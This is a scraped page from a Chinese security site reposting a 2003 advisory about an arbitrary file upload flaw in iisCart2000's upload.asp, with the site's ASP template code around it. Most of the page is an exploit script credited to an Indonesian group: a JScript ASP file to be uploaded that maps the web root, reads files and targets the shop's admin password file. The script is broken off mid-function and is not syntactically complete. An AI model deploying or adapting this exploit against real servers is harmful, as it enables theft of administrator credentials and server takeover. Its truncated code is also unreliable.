<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("code,supplied") PageTitle=stripHTML("iisCart2000 Arbitrary File Upload Vulnerability") ArticleIntro=stripHTML("77169.com小编引言:iisCart2000 Arbitrary File Upload Vulnerability,漏洞的主要原因:") Articlecontent=stripHTML("source: http://www.securityfocus.com/bid/7765/info

A vulnerability has been rep…") ModuleName = stripHTML("exploits") InfoID = stripHTML("170814") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> iisCart2000 Arbitrary File Upload Vulnerability - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> 其它漏洞 >> 正文

iisCart2000 Arbitrary File Upload Vulnerability

2003/5/29 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>
source: http://www.securityfocus.com/bid/7765/info

A vulnerability has been reported for iisCart2000 that may result in an attacker uploading arbitrary files to a vulnerable server. The vulnerability exists in the upload.asp script. This will allow an attacker to upload arbitrary files to the vulnerable server. Successful exploitation may result in the execution of attacker-supplied code. 

// 1ndonesian Security Team
// http://bosen.net/releases/
<% @ Language = JScript %>
function WinPath(absPath) {this.absolutePath = absPath;}
function getAbsPath() {return this.absolutePath;}
WinPath.prototype.getAbsolutePath = getAbsPath;

function fileRead(file) {
  var FSO = new ActiveXObject("Scripting.FileSystemObject"), strOut = ""
  var tmp = file, f, g = FSO.GetFile(tmp);
  f = FSO.OpenTextFile(tmp, 1, false);
  strOut = "<PRE STYLE=\"font-size:9pt;\">";
  strOut+= Server.HTMLEncode(f.ReadAll());
  strOut+= "</PRE>";

var a = new WinPath(Server.Mappath("/"));
var curDir   = a.getAbsolutePath();

// You can change these
var admin = curDir + "\\advanced\\admin\\pswd.asp";

with (Response) {
  Write("<b>ServerRoot : "+curDir+"<br></b>");
  Write("<b>Admin Info : "+admin+"<br><br></b>");